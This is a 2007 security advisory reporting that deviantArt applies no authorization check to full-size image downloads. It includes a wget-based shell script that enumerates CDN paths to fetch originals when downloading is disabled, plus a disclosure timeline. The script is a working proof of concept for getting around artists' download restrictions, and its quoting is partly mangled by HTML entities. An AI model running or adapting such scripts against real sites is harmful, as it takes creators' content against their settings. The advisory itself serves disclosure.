Security Advisory

Title: deviantArt does not check authorization for image download
Risk Rating: High
Platforms: Any
Author: Timothy Redaelli <[email protected]>
Date: 27-06-2007

Overview

deviantArt does not apply any type of authorization checking for full-size
image download.

Details

It is possibile to download the full-size (as uploaded) image also if the
Download button is disabled.

Proof of Concept

#!/bin/sh

Copyright (c) 2007 Timothy Redaelli <[email protected]>

URL=$1

download()
{
wget -U "" -nv "$@"
}

parse()
{
wget -U "" http://www.deviantart.com/download/&quot;$URL&quot;/ && exit 0
URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/&quot;$URL&quot;/ |
fgrep 'deviantART.pageData' | sed -e 's/^."fullview":
{[^}]"\(http[^"]\).$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i <= 0xF;
i++) for (j = 0; j <= 0xF; j++)
printf "http://69.28.181.52/&#37;s/f/&#37;s/&#37;s/&#37;x/&#37;x/&#37;s&#92;n&quot;, $4, $6, $7, i, j, $10}')
}

parse "$1"

echo "$URLS" | while read x; do
download "$x" && exit 0
done

Timeline

Mar 26, 2007 – Bug discovery.
Mar 27, 2007 – Contact deviantArt, no reply.
Jun 26, 2007 – Recontact deviantArt, still no reply.
Jun 27, 2007 – Bug published.

Credits

• Timothy Redaelli <[email protected]>

–
Timothy Redaelli
http://timothyredaelli.wordpress.com/